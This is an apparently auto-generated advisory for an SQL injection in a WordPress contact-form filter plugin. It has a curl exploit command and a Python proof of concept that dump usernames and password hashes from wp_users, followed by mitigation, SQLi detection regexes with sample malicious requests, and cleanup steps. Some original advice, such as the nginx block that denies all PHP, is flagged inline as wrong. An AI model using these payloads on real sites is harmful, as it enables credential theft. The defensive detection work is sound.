How the CVE Works:
CVE-2025-46252 is an SQL injection vulnerability in the “kofimokome Message Filter for Contact Form 7” plugin (versions up to 1.6.3.2). The flaw arises from improper sanitization of user-supplied input that is used in SQL queries. An attacker can submit crafted payloads through contact form submissions, and these values are passed directly into database queries. This allows unauthorized access to, exfiltration of, or manipulation of the WordPress database. The vulnerability is exploitable without authentication, which makes it critical.
DailyCVE Form:
Platform: WordPress
Version: ≤1.6.3.2
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025
What Undercode Say:
Analytics:
- Exploitability: High (no auth required)
- Attack Vector: Web-based (POST requests)
- Prevalence: ~50k+ installs
Exploit Commands:
curl -X POST "http://target.com/wp-admin/admin-ajax.php" -d "action=mfcf7_filter&data=1' UNION SELECT user_login,user_pass FROM wp_users-- -"
PoC Code (Python):
import requests

url = "http://victim.com/wp-admin/admin-ajax.php"
payload = {"action": "mfcf7_filter", "data": "1' UNION SELECT 1,concat(user_login,0x3a,user_pass) FROM wp_users-- -"}
r = requests.post(url, data=payload)
print(r.text)
Mitigation Steps:
1. Update to patched version >1.6.3.2.
2. Apply WAF rules blocking SQLi patterns:
location ~ \.php$ { deny all; }
Note: this nginx block is not a SQLi-pattern rule; it denies every PHP request, which would also block WordPress itself. A WAF rule for this issue should instead match SQL injection patterns in the data parameter of requests to admin-ajax.php.
3. Input validation regex:
$input = preg_replace("/[^a-zA-Z0-9]/", "", $_POST['data']);
Note: stripping characters is only a stopgap; the durable fix is to pass user input to the database through parameterised queries ($wpdb->prepare()) rather than concatenating it into SQL strings.
Detection (SQLi):
SELECT * FROM wp_mfcf7_logs WHERE data LIKE '%--%';
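The log query above only catches the comment sequence. As an added example (not from the original advisory), the following Python helper inspects request records for POSTs to admin-ajax.php that call the mfcf7_filter action with SQL injection indicators in the data parameter; it assumes you have records that include the POST body (for instance from a WAF or a reverse proxy with body logging), since ordinary access logs do not record request bodies. The sample records are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs

# Indicator patterns checked against the decoded value of one parameter.
SQLI_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("boolean-tautology", re.compile(r"'\s*(or|and)\s+", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("comment-terminator", re.compile(r"--\s*-?\s*$|/\*|#\s*$")),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("users-table", re.compile(r"\bwp_users\b", re.I)),
]

def sqli_indicators(value: str) -> List[str]:
    """Names of the indicator patterns that match a decoded parameter value."""
    return [name for name, rx in SQLI_PATTERNS if rx.search(value)]

def inspect_request(path: str, body: str) -> Optional[Dict[str, object]]:
    """Flag a POST to admin-ajax.php calling mfcf7_filter with a suspicious 'data'.

    Returns None for requests that are not of interest or that look benign.
    """
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)  # decodes %XX and '+'
    if params.get("action", [""])[0] != "mfcf7_filter":
        return None
    data = params.get("data", [""])[0]
    hits = sqli_indicators(data)
    if not hits:
        return None
    return {"path": path, "action": "mfcf7_filter", "data": data, "matched": hits}

def scan(records: List[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Run inspect_request over (path, body) records and keep the findings."""
    return [f for f in (inspect_request(p, b) for p, b in records) if f]

# Constructed sample records (path, raw POST body); not real traffic.
SAMPLE_REQUESTS = [
    ("/wp-admin/admin-ajax.php", "action=mfcf7_filter&data=42"),
    ("/wp-admin/admin-ajax.php",
     "action=mfcf7_filter&data=1%27+UNION+SELECT+user_login%2Cuser_pass+FROM+wp_users--+-"),
    ("/wp-admin/admin-ajax.php", "action=heartbeat&data=1%27+OR+1%3D1"),
    ("/wp-login.php", "log=admin&pwd=hunter2"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Only the second sample record is reported; the third carries a tautology but targets a different action, so it is out of scope for this rule and should be handled by a generic SQLi rule.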
Post-Exploit Cleanup:
DELETE FROM wp_options WHERE option_name LIKE '%transient%';
Note: this removes every transient (cached values that WordPress regenerates on demand); it does not undo other changes an attacker may have made, so users, options and uploaded files should be reviewed as well.
References:
- Patchstack Advisory: PS-2025-46252
- CWE-89: SQL Injection
- CVSS:4.0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode